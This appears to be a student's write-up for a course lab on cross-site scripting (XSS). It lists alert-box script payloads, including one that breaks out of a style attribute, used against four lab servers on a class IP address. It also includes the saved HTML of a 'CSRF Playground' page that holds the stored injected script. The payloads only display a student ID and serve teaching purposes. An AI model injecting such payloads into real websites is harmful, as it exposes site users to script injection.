Week4：XSS

1、140.134.25.138:5000 截圖 alert(“你的學號”)

• <script>alert('學號')</script>

2、140.134.25.138:5001 截圖 alert(“你的學號”)

• red"><script>alert('D0527796')</script><span style="color:red

3、140.134.25.138:5002 截圖 alert(“你的學號”)

• <script>alert('學號')</script>

4、140.134.25.138:5003 附上你的「HTML Code」

• <script>alert('學號')</script>

• <!DOCTYPE html>

​​​​<path d="M41 18H3c-.6 0-1-.4-1-1v-2C2 8.9 6.9 4 13 4h18c6 0 11 4.9 11 11v2c0 .6-.4 1-1 1zM39 37H5c-1.7 0-3-1.3-3-3v-2c0-.6.4-1 1-1h38c.5 0 1 .5 1 1v2c0 1.7-1.3 3-3 3zM1 27h42M1 22c3.5 0 3.5 2 7 2s3.5-2 7-2 3.5 2 7 2 3.5-2 7-2 3.5 2 7 2 3.5-2 7-2" class="line" fill="none" stroke="#000" stroke-width="2" stroke-linecap="round" stroke-miterlimit="10"></path>

​<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
​	<div class="container-fluid">
​		<div class="navbar-header">
​			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#sidebar-collapse">
​				<span class="sr-only">Toggle navigation</span>
​				<span class="icon-bar"></span>
​				<span class="icon-bar"></span>
​				<span class="icon-bar"></span>
​			</button>
​			<ul class="user-menu">
​				<li class="dropdown pull-right">

​					<ul class="dropdown-menu" role="menu">
​					</ul>
​				</li>
​			</ul>
​		</div>
​	</div><!-- /.container-fluid -->
​</nav>
​	
​<div id="sidebar-collapse" class="col-sm-3 col-lg-2 sidebar">
​</div><!--/.sidebar-->
​	
​<div class="col-sm-9 col-sm-offset-3 col-lg-10 col-lg-offset-2 main">			
​	<div class="row">

​	</div><!--/.row-->
​	
​	<div class="row">
​		<div class="col-lg-12">
​			<h1 class="page-header">CSRF Playground</h1>
​		</div>
​	</div><!--/.row-->
​			
​	
​	<div class="row">
​		<div class="col-lg-12">
​			<div class="panel panel-default">
​				<div class="panel-heading">Setting</div>
​				<div class="panel-body">
​					<div class="col-md-6">
​						<form method="post" action="http://140.134.25.138:5003/update">
​						<input type="text" class="form-control" name="color" placeholder="Color..."><br>
​​​​           			    <button class="btn btn-primary" type="submit">Submit</button>
​						<a style="float:right; margin-top:1%;" href="http://140.134.25.138:5003/update"> refresh the page</a><br>
​​​​           			</form></div>
​					
​				</div>
​			</div>
​		</div><!-- /.col-->
​	</div><!-- /.row -->
​
​​​​ <center> <p style="font-size:2em;">    </p><div style="color:red"><script>alert("D0527796")</script></div> <p></p></center>
​
​</div><!--/.main-->

​<script src="./CSRF Playground_files/jquery-1.11.1.min.js.download"></script>
​<script src="./CSRF Playground_files/bootstrap.min.js.download"></script>
​<script src="./CSRF Playground_files/chart.min.js.download"></script>
​<script src="./CSRF Playground_files/chart-data.js.download"></script>
​<script src="./CSRF Playground_files/easypiechart.js.download"></script>
​<script src="./CSRF Playground_files/easypiechart-data.js.download"></script>
​<script src="./CSRF Playground_files/bootstrap-datepicker.js.download"></script>
​<script>
​	!function ($) {
​		$(document).on("click","ul.nav li.parent > a > span.icon", function(){		  
​			$(this).find('em:first').toggleClass("glyphicon-minus");	  
​		}); 
​		$(".sidebar span.icon").find('em:first').addClass("glyphicon-plus");
​	}(window.jQuery);

​	$(window).on('resize', function () {
​	  if ($(window).width() > 768) $('#sidebar-collapse').collapse('show')
​	})
​	$(window).on('resize', function () {
​	  if ($(window).width() <= 767) $('#sidebar-collapse').collapse('hide')
​	})
​</script>